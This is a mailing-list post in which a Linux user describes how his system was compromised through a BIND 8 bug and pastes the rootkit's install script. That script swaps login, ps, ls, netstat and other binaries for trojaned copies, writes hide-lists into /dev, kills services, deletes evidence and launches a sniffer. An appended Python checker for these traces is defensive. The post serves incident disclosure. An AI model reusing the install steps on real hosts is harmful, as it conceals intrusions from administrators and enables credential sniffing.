>I guess I'd try something like "cat /dev/null>/var/run/utmp" trying to
>recreate the file and see if it makes any difference, although something
>tells me that wouldn't work, at least in the long run. In any case, the
>whole thing sounds way too suspicious to me. I would hate to cause any
>unnecessary alarm, but perhaps it would be wise to consider that the
>system may have been compromised. Did you take a look at all the log
>files to make sure everything is right? How about the bash history? A
>possible cracker may have installed a root kit that is causing all these
>problems. Just a suggestion.
>Nitebirdz
The system was compromised. It looks like the initial entry was
Jan 24, when the first batch of files was deposited in "/usr/ /".
But nothing seemed to have really occurred until the 24/25th.
Looking at the files that the idiot left behind, this is what the
install script did:
./fix /usr/bin/chfn bin/chfn
./fix /usr/bin/chsh bin/chsh
./fix /bin/login bin/login
./fix /bin/ls fileutils-3.13/src/ls
./fix /bin/du fileutils-3.13/src/du
./fix /usr/bin/passwd bin/passwd
./fix /bin/ps procps-1.01/ps
./fix /usr/bin/top procps-1.01/top
./fix /usr/sbin/in.rshd rshd/rshd
./fix /bin/netstat net-tools-1.32-alpha/netstat
./fix /sbin/ifconfig net-tools-1.32-alpha/ifconfig
./fix /usr/sbin/syslogd sysklogd-1.3/syslogd
./fix /usr/sbin/inetd inetd/inetd
./fix /usr/sbin/tcpd tcpd_7.4/tcpd
./fix /usr/bin/killall psmisc/killall
./fix /bin/killall psmisc/killall
ln -sf /bin/killall psmisc/pidof
ln -sf /usr/bin/killall psmisc/pidof
./fix /usr/bin/pidof psmisc/pidof
./fix /sbin/pidof psmisc/pidof
./fix /usr/bin/find findutils/find/find
echo ".rtmp" > /dev/ptyr
echo ".tmp" >> /dev/ptyr
echo "..." >> /dev/ptyr
echo " " >> /dev/ptyr
echo "rk" >> /dev/ptyr
echo "rks" >> /dev/ptyr
echo ".. " >> /dev/ptyr
echo "3 imap" > /dev/ptyp
echo "3 eggdrop" >> /dev/ptyp
echo "3 conf" >> /dev/ptyp
echo "3 sniff" >> /dev/ptyp
echo "unknown" > /dev/ptys
echo "unk" >> /dev/ptys
echo "unkn0wn" >> /dev/ptys
echo "crime" >> /dev/ptys
echo "1 195" > /dev/ptyq
echo "1 207" >> /dev/ptyq
echo "1 63" >> /dev/ptyq
killall -9 rpc.mountd rpc.portmap rpc.nfsd smbd portmap 1>/dev/null 2>/dev/null
killall -9 named nmbd snmpd ypasswd 1>/dev/null 2>/dev/null
killall -9 rpc.yppasswdd 1>/dev/null 2>/dev/null
mkdir /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/rpc.* /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/smbd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/portmap /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/nmbd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/named /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/snmpd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/imapd /dev/.rtmp 1>/dev/null 2>/dev/null
cat /etc/inetd.conf|grep -v imap > /etc/inetd.conf.good
mv /etc/inetd.conf.good /etc/inetd.conf
killall -HUP inetd 1>/dev/null 2>/dev/null
rm -rf bin fileutils-3.13 findutils fix inetd
rm -rf net-tools-1.32-alpha procps-1.01 psmisc rshd sysklogd-1.3
rm -rf tcpd_7.4 Makefile
if test -f ../rk.tgz; then rm -rf ../rk.tgz; fi 1>/dev/null 2>/dev/null 3>/dev/null
if test -f ../rk.tar; then rm -rf ../rk.tar; fi 1>/dev/null 2>/dev/null 3>/dev/null
if test -f ../u.tgz; then tar -zxf ../u.tgz; rm -rf ../u.tgz; fi 1>/dev/null 2>/dev/null 3>/dev/null
./linsniffer > tcp.log &
The script wasn't perfect because find wasn't really "fix"ed. It was still
able to find directories with a space and display them. The ls wasn't
fixed either, in that it displayed the /dev/.rtmp directory. My guess is
that it probably should not have.
The stupid thing is that if for any reason I would have had to reboot, I
would have discovered this earlier, as the login was changed so that it
wouldn't let anyone in. It did password checking only in /etc/passwd, the
shadow system was not used and no matter what password was assigned, I
could not log in. Pretty broken.
I'm back up temporarily, as I only did an upgrade install from 6.0 to 6.1
and there appear to be some config files that are not right, like inetd.conf.
The Elm program doesn't know where my mail is, i.e., it tries to open
/var/spool/mail. Yep, no user name. I'm using the Zshell.
So, it is back down shortly to do a complete install from scratch, which
sucks, but needs to be done. I've already copied everything over to the
extra hard disk space that I have, so that I can rebuild the other programs
and stuff that I have installed.
All because bind 8's NXT was broken, the guy got in. BTW, all the stuff
does is go out and probe other IP addresses for broken binds. There were
three class B groups that got probed with the files that are still here.
When I'm back up again, I will be posting a complete list of what I know
to my web site. It will be worth a look.
More later. It is going to be a long night.
MB
--
e-mail: [EMAIL PROTECTED]
Bart: Hey, why is it destroying other toys? Lisa: They must have
programmed it to eliminate the competition. Bart: You mean like
Microsoft? Lisa: Exactly. [The Simpsons - 12/18/99]
Visit - URL:http://www.vidiot.com/ (Your link to Star Trek and UPN)
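As an added example (not code from MB's post and not part of the kit he describes), here is a small Python host check for the traces the mail lists: a drop directory named only with whitespace like "/usr/ /", plain files and dot-named entries under /dev (the kit kept its hide-lists in /dev/ptyr, /dev/ptyp, /dev/ptys and /dev/ptyq and moved daemons into /dev/.rtmp), PIDs present in /proc but missing from a trojaned ps, and system binaries whose hashes no longer match a manifest taken from clean media. The manifest format, the fixture tree and its file contents are constructed assumptions so the checks run offline.

```python
#!/usr/bin/env python3
"""Added defender-side checks (not code from the original post) for the
traces MB describes: whitespace-only directory names, plain files and
hidden entries under /dev, processes hidden from ps, and system binaries
whose hashes differ from a known-good manifest. The manifest format and
the fixture tree are assumptions for illustration."""
import hashlib
import os
import re
import stat
import tempfile

# Names built only from dots and whitespace are easy to miss in a listing.
_ODD_NAME = re.compile(r"^[\s.]+$")


def suspicious_name(name: str) -> bool:
    """True for names such as ' ', '.. ' or '...' (but not '.' and '..')."""
    return name not in (".", "..") and _ODD_NAME.match(name) is not None


def find_odd_names(root: str) -> list:
    """Walk root and return every path whose last component is suspicious."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        hits.extend(os.path.join(dirpath, n)
                    for n in dirnames + filenames if suspicious_name(n))
    return sorted(hits)


def odd_entries_in_dev(dev_dir: str = "/dev") -> list:
    """Return (path, reason) for regular files and dot-named entries in dev_dir.
    Only device nodes, directories, symlinks and fifos belong there."""
    found = []
    for name in os.listdir(dev_dir):
        path = os.path.join(dev_dir, name)
        if stat.S_ISREG(os.lstat(path).st_mode):
            found.append((path, "regular file"))
        elif name.startswith("."):
            found.append((path, "hidden entry"))
    return sorted(found)


def list_proc_pids(proc_dir: str = "/proc") -> set:
    """The kernel's own view of running processes."""
    return {int(n) for n in os.listdir(proc_dir) if n.isdigit()}


def pids_hidden_from_ps(proc_pids, ps_pids) -> set:
    """PIDs in /proc that ps did not report: with a trojaned ps this is the
    set of processes it was configured to hide."""
    return set(proc_pids) - set(ps_pids)


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_manifest(manifest: dict, root: str = "/") -> dict:
    """Compare files under root with {relative_path: sha256} taken from clean
    media; returns {relative_path: 'ok' | 'modified' | 'missing'}."""
    report = {}
    for rel, good in manifest.items():
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            report[rel] = "missing"
        else:
            report[rel] = "ok" if sha256_of(path) == good else "modified"
    return report


def build_constructed_fixture() -> tuple:
    """Constructed sample tree mimicking the post's traces (not a real host).
    Returns (root, manifest) so the checks above can run offline."""
    root = tempfile.mkdtemp(prefix="rkcheck-")
    for d in (("usr", " "), ("usr", "bin"), ("dev", "pts"), ("dev", ".rtmp")):
        os.makedirs(os.path.join(root, *d))
    with open(os.path.join(root, "usr", " ", "..."), "w") as f:
        f.write("dropped file\n")
    with open(os.path.join(root, "dev", "ptyr"), "w") as f:
        f.write(".rtmp\n.tmp\n")            # hidden-name list, as in the post
    manifest = {}
    for rel, body in (("usr/bin/ls", b"clean ls"), ("usr/bin/ps", b"clean ps")):
        with open(os.path.join(root, rel), "wb") as f:
            f.write(body)
        manifest[rel] = sha256_of(os.path.join(root, rel))
    manifest["usr/bin/netstat"] = "0" * 64  # listed as clean, absent on host
    with open(os.path.join(root, "usr/bin/ps"), "wb") as f:
        f.write(b"trojaned ps")             # replaced after the manifest was taken
    return root, manifest


if __name__ == "__main__":
    root, manifest = build_constructed_fixture()
    print("odd names     :", find_odd_names(root))
    print("odd /dev items:", odd_entries_in_dev(os.path.join(root, "dev")))
    print("manifest      :", verify_manifest(manifest, root))
    # On a live host pass "/" and "/dev" instead, and diff list_proc_pids()
    # against the PIDs parsed from ps output.
```

The important design point, and the reason the manifest check takes a dictionary rather than shelling out to the system's own tools, is that on a box like this one ls, find, ps and netstat are exactly the binaries that were replaced, so any verdict built on their output is worthless; the hashes have to come from clean media and the walk has to use the kernel's view (os.walk, /proc) rather than the trojaned userland.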